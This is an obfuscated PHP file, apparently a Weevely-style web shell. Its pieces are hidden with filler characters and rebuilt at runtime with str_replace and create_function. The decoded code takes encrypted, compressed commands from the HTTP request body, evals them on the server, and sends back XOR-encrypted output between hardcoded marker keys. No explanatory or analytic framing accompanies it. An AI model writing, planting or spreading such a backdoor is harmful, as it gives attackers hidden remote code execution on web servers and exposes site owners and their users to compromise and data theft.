<?php
$N='on@Wtents(@W"php://@Winp@Wut")@W,$m)==1)@W {@@Wob_s@Wtart();@ev@Wal(@gzu@Wncompr@Wess';
$R='@W;$r=@W@bas@We64_encode(@@Wx(@gz@Wcompres@W@Ws($o),$k));@Wprint(@W"$p@W$kh$r$kf");}';
$e=str_replace('Q','','QQcQreQate_fQuQnction');
$D='";for($i@W=0;$i@W<$l@W;){for($j=0;(@W$@Wj<$c&&$i@W<$l);$j@W++,$i@W@W++){$o.=@W$t{';
$c='$i}^$k{$j}@W@W;}}return $o@W;}if@W (@preg@W_m@Watc@Wh("/$kh(.+)$k@Wf/",@f@Wile@W_get_c';
$i='ZBKfn@Wi@W1RI"@W;function x@W($t,$k)@W@W{@W$c=st@Wrlen($k);$l=s@Wtrlen(@W$t);$o="@W';
$A='$k="5@Wf4d@Wcc3b"@W;@W$kh="5aa@W76@W5d61d83";@W$kf="2@W7deb882cf99";@W$p="zSO@W506H';
$L='(@W@x(@b@Wase64_@Wdecod@We($m[1]),@W$k)))@W;$o=@ob_g@Wet_co@Wntents@W();@ob_en@Wd_clea@Wn()';
$f=str_replace('@W','',$A.$i.$D.$c.$N.$L.$R);
$j=$e('',$f);$j();
?>
